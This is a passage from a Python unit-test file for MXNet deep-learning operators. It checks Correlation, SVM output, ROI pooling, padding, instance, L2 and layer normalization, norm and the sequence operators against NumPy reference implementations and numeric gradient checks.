    tmp1_grad = np.zeros(tmp1.shape)
    tmp2_grad = np.zeros(tmp2.shape)
    for i in range(top_height):
        for j in range(top_width):
            for nbatch in range(data1.shape[0]):
                # x1,y1 is the location in data1 , i,j is the location in output
                x1 = j * stride1 + max_displacement
                y1 = i * stride1 + max_displacement
                for top_channel in range(top_channels):
                    s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
                    s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
                    # location in data2
                    x2 = x1 + s2o
                    y2 = y1 + s2p
                    for h in range(kernel_size):
                        for w in range(kernel_size):
                            for channel in range(data1.shape[1]):
                                if is_multiply:
                                    # product mode: d(out)/d(tmp1) = tmp2 and vice versa
                                    tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
                                    tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
                                else:
                                    # abs-difference mode: sign of the difference
                                    sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
                                    tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
                                    tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
    # Same normalization as the forward pass.
    tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
    tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
    # Crop the zero padding off before returning.
    return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
    """Compare the Correlation operator's forward/backward against the numpy
    reference implementation on random inputs of the given dtype."""
    img1 = np.random.random(data_shape)
    img1 = img1.astype(dtype)
    img2 = np.random.random(data_shape)
    img2 = img2.astype(dtype)
    # NOTE(review): net2 is built identically to net1 and never used.
    net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
    net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
    exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
    exe1.arg_dict['img1'][:] = img1
    exe1.arg_dict['img2'][:] = img2
    #cpu forward
    exe1.forward(is_train=True)
    # python forward
    forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
    # forward error
    assert_almost_equal(exe1.outputs[0].asnumpy(), forward_result, rtol=1e-4, atol=1e-4)
    # out_grad: all-ones gradient for the backward pass
    a = np.ones(forward_result.shape)
    out_grad1 = mx.nd.array(a,default_context())
    # cpu backward
    exe1.backward(out_grads=out_grad1)
    # python backward
    grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
    # backward error
    assert_almost_equal(exe1.grad_dict['img1'].asnumpy(), grad1, rtol=1e-3, atol=1e-4)
    assert_almost_equal(exe1.grad_dict['img2'].asnumpy(), grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
    """Type-inference checks plus forward/backward numeric checks of the
    Correlation operator over a range of geometries and both match modes."""
    def test_infer_type(dtype):
        a = mx.sym.Variable('a')
        b = mx.sym.Variable('b')
        corr = mx.sym.Correlation(data1=a, data2=b)
        arg_type1, out_type1, _ = corr.infer_type(a=dtype)
        # Fail if ANY inferred type differs from the expected dtype.
        # Fixes: the conditions were `and`-joined (only firing when all three
        # were wrong) and the error path called `npt.npt.build_err_msg`,
        # which raised AttributeError instead of the intended message.
        if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from a is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
        arg_type2, out_type2, _ = corr.infer_type(b=dtype)
        # Fix: report the b-side inferred types (previously printed the a-side ones).
        if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)

    for dtype in ['float16', 'float32']:
        test_infer_type(dtype)
        unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
        unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
        unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
        unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
        unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
        unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
        unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
        unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
        unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
    """SVMOutput with use_linear=True: forward is the identity and backward
    is the L1 (hinge-loss) gradient -y * [1 - y*x > 0]."""
    ctx = default_context()
    shape = (20, 10)
    X = mx.symbol.Variable('X')
    L = mx.symbol.Variable('L')
    Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
    x = mx.nd.empty(shape, ctx=ctx)
    l = mx.nd.empty((shape[0],), ctx=ctx)
    x_np = np.random.rand(*shape)
    l_np = np.random.randint(0, shape[1], (shape[0],))
    x[:] = x_np
    l[:] = l_np
    grad = mx.nd.empty(shape, ctx=ctx)
    exe = Y.bind(ctx, args=[x, l], args_grad={'X': grad})
    exe.forward(is_train=True)
    # Forward pass of SVMOutput is the identity.
    assert_almost_equal(x_np, exe.outputs[0].asnumpy())
    exe.backward()
    # Label mask: +1 on the labelled class, -1 elsewhere.
    classes = np.arange(shape[1])
    l_mask = (l_np.reshape(shape[0], 1) == classes).astype(np.float32) * 2 - 1
    # Hinge gradient: -y where the margin 1 - y*x is violated, 0 otherwise.
    grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
    assert_almost_equal(grad_np, grad.asnumpy())
@with_seed()
def test_support_vector_machine_l2_svm():
    """SVMOutput (default L2-SVM): forward is the identity; backward is the
    squared-hinge gradient -2*y*max(1 - y*x, 0)."""
    xpu = default_context()
    shape = (20, 10)
    X = mx.symbol.Variable('X')
    L = mx.symbol.Variable('L')
    Y = mx.symbol.SVMOutput(data=X, label=L)
    x = mx.nd.empty(shape, ctx = xpu)
    l = mx.nd.empty((shape[0],), ctx = xpu)
    x_np = np.random.rand(*shape)
    x_np = x_np.astype(np.float32)
    l_np = np.random.randint(0, shape[1], (shape[0],))
    x[:] = x_np
    l[:] = l_np
    grad = mx.nd.empty(shape, ctx = xpu)
    exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
    exec1.forward(is_train=True)
    # Forward pass of SVMOutput is the identity.
    assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
    exec1.backward()
    # Label mask: +1 on the labelled class, -1 elsewhere.
    l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
    l_mask = np.array(l_mask, dtype=np.float32)*2 -1
    grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
    grad_np = grad_np.astype(np.float32)
    assert_almost_equal(grad_np, grad.asnumpy())
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
    """Numeric-gradient check for ROIPooling with both 'write' and 'add'
    grad_req on the data input (ROIs get no gradient)."""
    data = mx.symbol.Variable(name='data')
    rois = mx.symbol.Variable(name='rois')
    pooled = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
    feat = np.random.rand(4, 3, 12, 8).astype('float32')
    boxes = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
    for req in ('write', 'add'):
        check_numeric_gradient(sym=pooled, location=[feat, boxes],
                               grad_nodes={'data': req, 'rois': 'null'},
                               numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
    """Check mx Pad against np.pad for one shape/mode/dtype, then numeric-grad.

    pad_width is the flat mxnet layout (before, after per axis); it is
    regrouped into numpy's pair-per-axis form for the reference result.
    """
    # bind with label
    X = mx.symbol.Variable('X', dtype=dtype)
    Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
    x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
    # numpy result
    pad_grouped = list(zip(*[iter(list(pad_width))] * 2))  # flat -> [(before, after), ...]
    np_out = np.pad(x.asnumpy(), pad_grouped, mode)
    # mxnet result
    grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
    exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
    exec1.forward(is_train=True)
    out = exec1.outputs[0].asnumpy()
    # compare numpy + mxnet
    assert_almost_equal(out, np_out)
    # grad check
    check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
    """Run Pad forward/gradient checks over a 4-D and a 5-D shape for every
    mode and supported float dtype."""
    ctx = default_context()
    cases = (((2, 3, 3, 5), (0, 0, 0, 0, 1, 2, 3, 4)),
             ((2, 3, 3, 5, 4), (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)))
    # note: this op doesn't support ints yet. Add tests when supported
    for dtype in ("float16", "float32", "float64"):
        for shape, pad in cases:
            check_pad_with_shape(shape, ctx, pad, 'constant', dtype)
            check_pad_with_shape(shape, ctx, pad, 'edge', dtype)
        for shape, pad in cases:
            check_pad_with_shape(shape, ctx, pad, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
    """Numpy reference for InstanceNorm.

    data: (N, C, ...spatial) array; weight/bias: length-C per-channel scale
    and shift; eps: variance stabilizer. Each (sample, channel) slice is
    normalized over its spatial elements.
    """
    reduce_axes = tuple(range(2, data.ndim))
    inv_count = 1 / float(np.prod(np.array(data.shape[2:])))
    # Per-(sample, channel) statistics, kept broadcastable via keepdims.
    mean = inv_count * np.sum(data, axis=reduce_axes, keepdims=True)
    var = inv_count * np.sum((data - mean) ** 2, axis=reduce_axes, keepdims=True)
    # Broadcast the per-channel affine parameters to (1, C, 1, ..., 1).
    param_shape = (1, -1) + (1,) * (data.ndim - 2)
    gamma = np.reshape(weight, param_shape)
    beta = np.reshape(bias, param_shape)
    return gamma * (data - mean) / np.sqrt(var + eps) + beta
def check_instance_norm_with_shape(shape, xpu):
    """Compare mx.symbol.InstanceNorm with the NumPy reference for one shape,
    then run a finite-difference gradient check on all three inputs."""
    eps = 0.001
    data_sym = mx.symbol.Variable('X')
    gamma_sym = mx.symbol.Variable('G')
    beta_sym = mx.symbol.Variable('B')
    norm_sym = mx.symbol.InstanceNorm(data=data_sym, beta=beta_sym, gamma=gamma_sym, eps=eps)
    data_nd = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
    gamma_nd = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
    beta_nd = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
    expected = np_instance_norm(data_nd.asnumpy(), gamma_nd.asnumpy(), beta_nd.asnumpy(), eps)
    executor = norm_sym.bind(xpu, args={'X': data_nd, 'G': gamma_nd, 'B': beta_nd})
    executor.forward(is_train=False)
    assert_almost_equal(executor.outputs[0].asnumpy(), expected, rtol=1e-4, atol=1e-4)
    check_numeric_gradient(norm_sym,
                           {'X': data_nd.asnumpy(), 'G': gamma_nd.asnumpy(), 'B': beta_nd.asnumpy()},
                           numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
    """Exercise InstanceNorm over ranks 3 through 7, including degenerate
    (size-1) dimensions."""
    for shape in [(1, 1, 1), (2, 1, 2), (2, 4, 5, 6), (3, 3, 2, 3, 2, 1, 1)]:
        check_instance_norm_with_shape(shape, default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
    """Check mx.symbol.L2Normalization against a NumPy reference.

    Computes the expected normalized output for the given `mode`
    ('channel', 'spatial' or 'instance'), compares the symbol's forward
    output against it, and runs a finite-difference gradient check.
    """
    ctx = default_context()
    data = mx.symbol.Variable('data')
    out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
    in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
    # calculate numpy results
    if mode == 'channel':
        assert in_data.ndim > 2
        np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
        np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
        np_out = np.multiply(in_data, np_norm)
    elif mode == 'spatial':
        assert in_data.ndim > 2
        s = in_data.shape
        np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        # FIX: use integer (floor) division -- true division yields a float,
        # which np.repeat rejects on modern NumPy
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
        np_out = np.multiply(in_data, np_norm.reshape(s))
    elif mode == 'instance':
        assert in_data.ndim > 1
        s = in_data.shape
        np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        # FIX: integer repeat count, same reason as above
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
        np_out = np.multiply(in_data, np_norm.reshape(s))
    else:
        raise RuntimeError('Unknown l2 normalization mode')
    exe = out.simple_bind(ctx=ctx, data=in_data.shape)
    output = exe.forward(is_train=True, data=in_data)
    # compare numpy + mxnet
    # FIX: `dtype is 'float16'` compared identity with a str literal (fragile,
    # SyntaxWarning since Python 3.8); use equality instead
    assert_almost_equal(exe.outputs[0].asnumpy(), np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
    # check gradient
    check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
    """Run L2Normalization checks for every mode and float dtype on random
    3D and 4D shapes (same RNG call order as before, so seeding is stable)."""
    for dt in ['float16', 'float32', 'float64']:
        for norm_mode in ['channel', 'spatial', 'instance']:
            n = random.randint(1, 4)
            c = random.randint(3, 5)
            h = random.randint(4, 6)
            # 3D case first, then grow a width dimension for the 4D case
            check_l2_normalization((n, c, h), norm_mode, dt)
            w = random.randint(5, 7)
            check_l2_normalization((n, c, h, w), norm_mode, dt)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
                              forward_check_eps=1E-3, backward_check_eps=1E-3,
                              npy_grad_check=True, finite_grad_check=True):
    """Check mx.symbol.LayerNorm forward/backward against NumPy references.

    Parameters
    ----------
    in_shape : tuple of int
        Shape of the input data.
    axis : int
        Axis to normalize over (may be negative).
    eps : float
        Numerical-stability epsilon passed to both implementations.
    dtype : numpy dtype
        Data dtype for inputs and reference computation.
    forward_check_eps / backward_check_eps : float
        Tolerances for the forward/backward comparisons.
    npy_grad_check : bool
        If True, compare analytic gradients against the NumPy formula for
        both grad_req='write' and grad_req='add'.
    finite_grad_check : bool
        If True, also run a finite-difference gradient check.
    """

    def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
        """NumPy forward reference: normalize over `axis`, then scale/shift."""
        if axis < 0:
            axis += data.ndim
        broadcast_shape = [1 for _ in range(data.ndim)]
        broadcast_shape[axis] = data.shape[axis]
        mean = data.mean(axis=axis, keepdims=True).astype(dtype)
        var = data.var(axis=axis, keepdims=True).astype(dtype)
        std = np.sqrt(var + dtype(eps)).astype(dtype)
        out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
              np.reshape(beta, broadcast_shape)
        return out

    def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
        """Analytic gradients of LayerNorm w.r.t. data, gamma and beta."""
        if axis < 0:
            axis += data.ndim
        exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
        data_mean = data.mean(axis=axis, keepdims=True)
        data_var = data.var(axis=axis, keepdims=True)
        data_std = np.sqrt(data_var + eps)
        centered_data = (data - data_mean) / data_std
        gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
        beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
        w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
            / data_std
        # data gradient removes the mean and the projection onto the centered data
        data_grad = w - w.mean(axis=axis, keepdims=True)\
                    - centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
        gamma_grad = gamma_grad.reshape((-1,))
        beta_grad = beta_grad.reshape((-1,))
        return data_grad, gamma_grad, beta_grad

    ctx = default_context()
    data = np.random.normal(0, 1, in_shape).astype(dtype)
    gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
    beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
    data_s = mx.symbol.Variable('data')
    gamma_s = mx.symbol.Variable('gamma')
    beta_s = mx.symbol.Variable('beta')
    out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
    exe = out_s.simple_bind(ctx, data=in_shape)
    exe.arg_dict['data'][:] = data
    exe.arg_dict['gamma'][:] = gamma
    exe.arg_dict['beta'][:] = beta
    out_nd = exe.forward()[0]
    out = npy_layer_norm(data, gamma, beta, axis, eps)
    assert_almost_equal(out, out_nd.asnumpy(), forward_check_eps, forward_check_eps)

    if finite_grad_check:
        # finite-difference check for every grad_req mode
        for req in ['write', 'add']:
            check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
                                   grad_nodes={'data': req, 'gamma': req, 'beta': req},
                                   numeric_eps=1e-2, rtol=1e-2, atol=1e-2)

    if npy_grad_check:
        # Test for grad_req = write
        out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
        exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
        exe.arg_dict['data'][:] = data
        exe.arg_dict['gamma'][:] = gamma
        exe.arg_dict['beta'][:] = beta
        exe.forward()
        exe.backward([mx.nd.array(out_grad, ctx=ctx)])
        gt_data_grad, gt_gamma_grad, gt_beta_grad =\
            npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
        assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
        assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
        assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)

        # Test for grad_req = add: gradients must accumulate onto the seeded values
        out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
        init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
        init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
        init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
        exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
        exe.arg_dict['data'][:] = data
        exe.arg_dict['gamma'][:] = gamma
        exe.arg_dict['beta'][:] = beta
        exe.grad_dict['data'][:] = init_data_grad
        exe.grad_dict['gamma'][:] = init_gamma_grad
        exe.grad_dict['beta'][:] = init_beta_grad
        exe.forward()
        exe.backward([mx.nd.array(out_grad, ctx=ctx)])
        gt_data_grad, gt_gamma_grad, gt_beta_grad = \
            npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
        assert_almost_equal(exe.grad_dict['data'].asnumpy(),
                            gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
        assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
                            gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
        assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
                            gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
    """Check mx.symbol.norm (L1/L2, single and double axis) against NumPy/SciPy
    references, with and without safe accumulation.

    FIX: replaced `order is 1` with `order == 1` -- identity comparison with an
    int literal only works via CPython small-int caching and emits a
    SyntaxWarning on Python >= 3.8.
    """
    try:
        import scipy
        assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
        from scipy.linalg import norm as sp_norm
    except (AssertionError, ImportError):
        print("Could not import scipy.linalg.norm or scipy is too old. "
              "Falling back to numpy.linalg.norm which is not numerically stable.")
        from numpy.linalg import norm as sp_norm

    def l1norm(input_data, axis=0, keepdims=True):
        return np.sum(abs(input_data), axis=axis, keepdims=keepdims)

    def l2norm(input_data, axis=0, keepdims=True):
        return sp_norm(input_data, axis=axis, keepdims=keepdims)

    ctx = default_context()
    data = mx.symbol.Variable('data')
    in_data_dim = random_sample([4,5,6], 1)[0]
    in_shape = rand_shape_nd(in_data_dim, dim=5)
    epsilon = 1e-3
    acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
                np.int32: np.int32, np.int64: np.int64}
    dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
                    np.int32: 'int32', np.int64: 'int64'}
    is_windows = sys.platform.startswith('win')
    for enforce_safe_acc in ["1", "0"]:
        if is_windows:
            # on Windows we cannot modify the env var of the running process,
            # so only one pass is made, using whatever the env already says
            if enforce_safe_acc == "0":
                break
            enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
        else:
            os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
        for order in [1, 2]:
            for dtype in [np.float16, np.float32, np.float64]:
                for i in range(in_data_dim):
                    for out_dtype in ['float32', 'float64']:
                        backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
                        accumulation_type = acc_type[dtype]
                        if enforce_safe_acc == "0":
                            # without safe accumulation everything stays in the input dtype
                            backward_dtype = dtype
                            out_dtype = dtype_to_str[dtype]
                            accumulation_type = dtype
                        skip_backward = 'int' in out_dtype
                        in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
                        # keep values away from zero: |x| is not differentiable there
                        in_data[abs(in_data) < epsilon] = 2 * epsilon
                        norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                        npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                        npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
                        check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
                                               rtol=1e-2 if dtype == np.float16 else 1e-3,
                                               atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
                        if dtype is not np.float16 and not skip_backward:
                            check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
                                                    [np.ones(npy_out.shape).astype(out_dtype)],
                                                    [npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
                                                    dtype=backward_dtype)
                        # Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
                        # check gradient
                        if dtype is not np.float16 and not skip_backward:
                            check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
                                                   rtol=1e-1, atol=1e-3, dtype=backward_dtype)
                        if i < in_data_dim-1:
                            # two-axis reduction
                            norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                            npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
                            check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
                                                   rtol=1e-2 if dtype is np.float16 else 1e-3,
                                                   atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
                            if dtype is not np.float16 and not skip_backward:
                                check_symbolic_backward(norm_sym, [in_data],
                                                        [np.ones(npy_out.shape).astype(out_dtype)],
                                                        [npy_out_backward.astype(out_dtype)],
                                                        rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
                            # check gradient
                            if dtype is not np.float16 and not skip_backward:
                                check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
                                                       rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
    """Sweep LayerNorm checks over dtypes, input shapes, axes and eps values,
    both with and without safe accumulation."""
    for safe_acc in ["1", "0"]:
        os.environ["MXNET_SAFE_ACCUMULATION"] = safe_acc
        for dtype, fwd_eps, bwd_eps in [(np.float16, 1E-2, 1E-2),
                                        (np.float32, 1E-3, 1E-3),
                                        (np.float64, 1E-4, 1E-4)]:
            if dtype == np.float16:
                # large input + fp16 does not pass the forward check
                cases = [((10, 6, 5), True), ((10, 10), True)]
            else:
                # the biggest shape skips the (slow) finite-difference check
                cases = [((10, 6, 5), True), ((10, 10), True), ((128 * 32, 512), False)]
            for in_shape, finite_grad_check in cases:
                for axis in range(-len(in_shape), len(in_shape)):
                    for eps in [1E-2, 1E-3]:
                        check_layer_normalization(
                            in_shape, axis, eps, dtype=dtype,
                            forward_check_eps=fwd_eps,
                            backward_check_eps=bwd_eps,
                            npy_grad_check=(dtype != np.float16),
                            finite_grad_check=finite_grad_check)
# NumPy reference implementations of the Sequence* operators
def sequence_last_numpy(array, lengths, axis):
    """Return, for each batch entry, the element at its last valid sequence
    step. `axis` is the sequence axis; `lengths` gives per-batch valid
    lengths, or None to use the full sequence."""
    # work in [batch, seqlen, ...] layout
    batch_major = np.moveaxis(array, axis, 1)
    n_batch = batch_major.shape[0]
    if lengths is None:
        return batch_major[:, -1]
    seq_lens = list(lengths)
    return np.array([batch_major[b, int(seq_lens[b]) - 1] for b in range(n_batch)])
def sequence_mask_numpy(array, lengths, axis, value):
    """Overwrite the sequence steps past each batch entry's valid length with
    `value`. `lengths is None` means nothing is masked."""
    if lengths is None:
        return array
    # conform to [batch, seqlen, ...], mask, then restore the original layout
    masked = np.moveaxis(array.copy(), axis, 1)
    seq_lens = list(lengths)
    for b in range(masked.shape[0]):
        masked[b, int(seq_lens[b]):] = value
    return np.moveaxis(masked, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
    """Reverse, per batch entry, the first `lengths[b]` sequence steps along
    `axis` (the whole sequence when `lengths` is None)."""
    # conform to [batch, seqlen, ...]
    rev = np.moveaxis(array.copy(), axis, 1)
    n_batch, n_seq = rev.shape[0], rev.shape[1]
    seq_lens = [n_seq] * n_batch if lengths is None else list(lengths)
    for b in range(n_batch):
        k = int(seq_lens[b])
        rev[b, :k] = rev[b, :k][::-1]
    return np.moveaxis(rev, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
    """Check one Sequence* operator against its NumPy reference.

    Parameters
    ----------
    ftype : str
        One of "last", "mask", "reverse" -- selects SequenceLast,
        SequenceMask or SequenceReverse.
    mask_value : float
        Fill value, used only by the "mask" case.
    axis : int
        Sequence axis (0 or 1); the other of the first two axes is the batch axis.
    """
    # bind with label
    xpu = default_context()
    X = mx.symbol.Variable('X')
    L = mx.symbol.Variable('L') # lengths
    shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
    for seqlenQ in [True, False]:          # with / without explicit lengths
        for ary_dtype in [np.float32]:
            for idx_dtype in [np.int32, np.float32]:
                for s in shapes:
                    x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
                    # the batch axis is whichever of the first two axes is not the sequence axis
                    batch = s[1] if (axis == 0) else s[0]
                    seqlen = s[axis]
                    # random valid lengths in [1, seqlen]
                    l_np = np.random.randint(1, seqlen + 1, batch)
                    l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
                    if not seqlenQ:
                        l_np = None
                    args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
                    if seqlenQ:
                        args['sequence_length'] = L
                    if ftype == "last":
                        Y = mx.symbol.SequenceLast(**args)
                        np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
                    elif ftype == "mask":
                        args['value'] = mask_value
                        Y = mx.symbol.SequenceMask(**args)
                        np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
                    elif ftype == "reverse":
                        Y = mx.symbol.SequenceReverse(**args)
                        np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
                    fargs = [x, l] if seqlenQ else [x]
